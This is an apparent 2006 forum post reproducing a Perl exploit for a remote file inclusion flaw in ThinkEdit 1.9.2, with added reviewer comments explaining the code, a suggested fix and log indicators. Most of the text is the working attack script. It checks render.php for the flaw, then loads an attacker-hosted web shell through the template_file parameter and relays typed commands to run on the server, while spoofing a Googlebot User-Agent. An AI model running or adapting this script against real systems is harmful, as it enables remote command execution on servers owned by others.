Don — Posted December 8, 2006

##################################################################################################
# r0ut3r Presents...
#
# Another r0ut3r discovery!
# writ3r [at] gmail.com
#
# ThinkEdit Remote File Inclusion Exploit
##################################################################################################
# Software: ThinkEdit 1.9.2
#
# Vendor: http://www.thinkedit.org/
#
# Released: 2006/12/08
#
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)
#
# Note: The information provided in this document is for ThinkEdit administrator
# testing purposes only!
#
# Solution:
# Add the below code to the top of render.php
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))
#     die();
#
# (Review note: this guard only stops direct requests to render.php. It does not
# validate template_file itself; the script's own messages suggest the parameter
# reaches the include through register_globals, so initialising the variable in
# code and keeping register_globals and remote URL includes (allow_url_fopen /
# allow_url_include) switched off addresses the cause rather than one entry point.)
#
# Exploit:
# perl think.pl http://localhost /think/ http://localhost/cmd.txt cmd
#
# design/thinkedit/render.php?template_file=
##################################################################################################

#############################################################################
# Remote File Inclusion Exploiter
#
# This script attempts to exploit a remote file include vulnerability
# by inserting a web shell into an include statement. A shell is then
# spawned.
#
# Created By r0ut3r (writ3r [at] gmail.com)
#############################################################################
#
# Reviewer summary (defensive reading of the listing below; code tokens and
# string literals are reproduced exactly as they appear in the forum post):
#   1. Probe: one GET to <folder>render.php with a fixed marker string as
#      template_file; the target is treated as vulnerable if the marker shows
#      up anywhere in the response.
#   2. Loop: for every line typed on STDIN, one GET to the same script with
#      template_file set to the caller-supplied URL and the typed line passed
#      in the caller-named query parameter.
# What this leaves in web-server logs: requests for render.php carrying a
# template_file parameter (an absolute URL in step 2) and a User-Agent that
# claims to be Googlebot - so the User-Agent alone is not evidence of a crawler.
use IO::Socket;

$port = "80";           # TCP port used for every connection
$target = @ARGV[0];     # 1st argument: target host (usage example: localhost)
$folder = @ARGV[1];     # 2nd argument: application directory (usage example: /think/)
$shellloc = @ARGV[2];   # 3rd argument: URL passed as template_file (usage example: http://localhost/cmd.txt)
$cmdv = @ARGV[3];       # 4th argument: name of the query parameter that carries the typed line

# No "use strict" is in effect, so the barewords false/true are plain strings;
# the later "eq false" tests are string comparisons against "false".
$vulnerable = false;
$s = true;

# Prints the tool banner.
sub Header(){
    print q {Remote File Inclusion Exploiter - By r0ut3r (writ3r [at] gmail.com)-------------------------------------------------------------------};
}

# Prints the command-line synopsis and terminates the program.
sub Usage(){
    print q {Usage: think.pl [target] [directory] [shell_loc] [cmd_variable]perl think.pl [url]http://localhost[/url] /think/ [url]http://localhost/cmd.txt[/url] cmd};
    exit();
}

Header();

# All four arguments are required; any empty or "0" value falls through to Usage().
if (!$target || !$folder || !$shellloc || !$cmdv) { Usage(); }

# $s is set to true above and never reassigned in this listing, so this branch
# cannot run as written.
if ($s eq false) { print "[-] Shell not foundn"; exit(); }

# Check if the script is vulnerable and register_globals are on (if needed)
# The probe requests render.php with a marker value in template_file and then
# scans every response line for that marker.
# NOTE(review): the marker presumably comes back inside a PHP include error
# message - confirm against the application; if so, turning display_errors off
# hides the signal but does not fix the inclusion.
$vulnc = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...rn";
print $vulnc "GET ".$folder."render.php?template_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1n";
print $vulnc "Host: $targetn";
print $vulnc "User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])n";
print $vulnc "Accept: text/htmln";
print $vulnc "Connection: keep-alivenn";

while (<$vulnc>) {
    if (/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/) { $vulnerable = true; }
}

# Stop when the marker was not seen; the message names register_globals being
# off as one possible reason.
if ($vulnerable eq false) { print "[-] Target not vulnerable, or register_globals could be offn"; exit(); }

print "[+] Starting shelln";
print "[cmd]$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;      # replaces spaces in the line just read with %20

# One new TCP connection and one GET per typed line, until a line matches "exit".
# substr($cmd, 0, -1) drops the last character of the line before it is placed
# in the query string.
while ($cmd !~ "exit"){
    $xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...rn";
    # The next string literal is kept exactly as posted, including the line
    # break inside it.
    print $xpack "GET ".$folder."render.php?template_file=".$shellloc."&".$cmdv."=".substr($cmd, 0, -1)." 
HTTP/1.1n";
    print $xpack "Host: $targetn";
    print $xpack "User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])n";
    print $xpack "Accept: text/htmln";
    print $xpack "Connection: keep-alivenn";
    print "[cmd]$ ";
    $cmd = <STDIN>;
}

print "[!] Connection to host lost...n";